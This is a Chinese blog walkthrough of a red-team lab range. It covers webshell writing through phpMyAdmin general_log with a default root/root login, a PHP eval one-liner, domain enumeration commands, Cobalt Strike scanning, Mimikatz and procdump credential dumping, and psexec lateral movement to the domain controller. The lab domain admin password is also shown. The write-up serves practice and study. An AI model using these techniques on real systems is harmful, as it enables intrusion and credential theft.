红队评估实战靶场(1)

0x00前言[滑稽][滑稽]又是我,我又来发水文了,这几天打靶机打上瘾了,再来更新篇靶机的文章0x01靶机渗透配置好靶机后,这里需要打开win7,来到c盘目录下启动phpstudy启动完成后

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

0x00前言

[滑稽][滑稽]又是我,我又来发水文了,这几天打靶机打上瘾了,再来更新篇靶机的文章

0x01 靶机渗透

配置好靶机后,这里需要打开win7,来到c盘目录下启动phpstudy

红队评估实战靶场(1)

启动完成后,就可以开始了,这里的要求是从web打点打进去。这里发现用的phpstudy应该是有后门的,可以用,phpstudy的exp来打一下。但是我们这里还是遵守一下规则,走个正常流程

这里就先打开御剑,扫描一下目录

红队评估实战靶场(1)

有个beifen.rar的压缩包,猜想一下,应该是备份的拼音[手动滑稽][手动滑稽]

红队评估实战靶场(1)

发现是个yxcms的网站,浏览器进行打开

红队评估实战靶场(1)

果不其然就是个yxcms的网站,先对他进行保存,然后再来翻找一下phpinfo页面来保存一下他的绝对路径等会可能会用到

红队评估实战靶场(1)

绝对路径:

C:/phpStudy/WWW

现在再来翻找一下phpmyadmin的目录。

红队评估实战靶场(1)

来尝试一下弱口令 phpmyadmin的默认口令root/root,一试之下居然进去了,进入后的第一步肯定是写shell。看看能不能用into outfile来写shell。
into outfile 的写入条件是 “secure_file_priv”不能为null要为空才能进行写入。
先用sql语句来查看一下

SHOW VARIABLES LIKE “secure_file_priv”

红队评估实战靶场(1)

显示为null 无法直接使用into outfile继续写入,那么这里还可以尝试使用日志来写shell

show variables like ‘%general%’;

查看日志是否开启

SET GLOBAL general_log=’on’

开启日志

SET GLOBAL general_log_file=’C:\phpStudy\WWW\xxx.php’

设置日志的文章为php文件
这里得填2个反斜杠

SELECT ‘<?php eval($_POST[“cmd”]);?>’

然后就可以直接查询一句话就会写入到我们的日子里面,也就是xxx.php里面去。

访问xxx.php 看看文件是否存在

红队评估实战靶场(1)

这里显示了一些查询内容,并没有显示一句话的代码出来说明,一句话已经被执行了

直接使用蚁剑连接

成功拿下webshell
查询一下当前权限

whoami

红队评估实战靶场(1)

当前是个域管理员的权限,在来对该机器对一系列的信息收集

1.ipconfig /all  

2.systeminfo 
  
3.net config workstation 查看当前登录域 和用户登录信息

4.net time /domain  查看主域控时间

红队评估实战靶场(1)

红队评估实战靶场(1)

看到对方机器确实在域环境里面,dns的普遍会搭载在域控机器上,在于里面都是以dns去定位机器的位置的

这里还发现机器拥有2块网卡,一块网卡应该是开放web服务,而另一块则是与内网进行连通

再来判断该机器是否在域中

net localgroup administrators 

net user /domain

net group /domain

net group "Domain Admins" /domain

net group "Domain Controllers" /domain

目前就知道了域控名字为OWA

ping owa.god.org

红队评估实战靶场(1)

ping一下域控的主机名直接拿到域控的ip,定位域控的位置

接下来就直接交给cs去完成了

红队评估实战靶场(1)

使用http的隧道能直接上线

使用cs扫描52网段的主机存活

portscan 192.168.52.0/24 445 arp 200

红队评估实战靶场(1)

机器上线的时候就发现没有uac能直接提权,运行mimikatz 抓取密码

红队评估实战靶场(1)

域管理员的密码为:

hongrisec@2019.

尝试直接psexec进行登录到192.168.52.141的机器上面去,尝试过后发现并不能上线,可能是对方的机器http无法出网。
那么这里就直接添加一个smb的直连模式然后进行psexec的登陆

红队评估实战靶场(1)

这里就直接上线成功了

红队评估实战靶场(1)

这里能成功上线但是运行mimikatz抓取密码会失败,只能使用hashdump抓取密码

上传procdump 来抓取lsass进程,然后到本地来使用mimiktz解密

这里使用procdump和mimikatz都失败了,原因可能是03主机的缘故,不兼容。

既然抓不了明文密码的话,那么就把他个代理出来,然后使用采集到的密码去跑

前面采用ew开启socket的时候,也没做截图 就不演示了 ,尝试着使用http的reg正向代理看看能不能代理出来

红队评估实战靶场(1)

但是我这使用reg代理的时候又出现问题了 ,不知道是我配置问题还是怎么样根本就连接不上,按理来说http是能出网的

接下来就尝试直接使用同样的方式使用administrator的用户密码去进行psexec登录 登录到域控

红队评估实战靶场(1)

成功拿下域控机器

红队评估实战靶场(1)

0x02 结尾

在后面的时间里面又去下载了个ladon,发现ladon的功能太强了,而且还能集成在cs里面,以前也是知道,没有真的去用过,内网中想要快速探测必不可少的工具还有个就nbtscan 这里因为就3台机器,就没必要在上传ntbtscan去扫描了。cs的功能虽然是很强大,也集成了很多横向移动的工具,但是都被阉割掉部分的功能。这靶机在做前就知道密码都那同样的一样密码,在后面的渗透就会变得没意思

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/119962.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号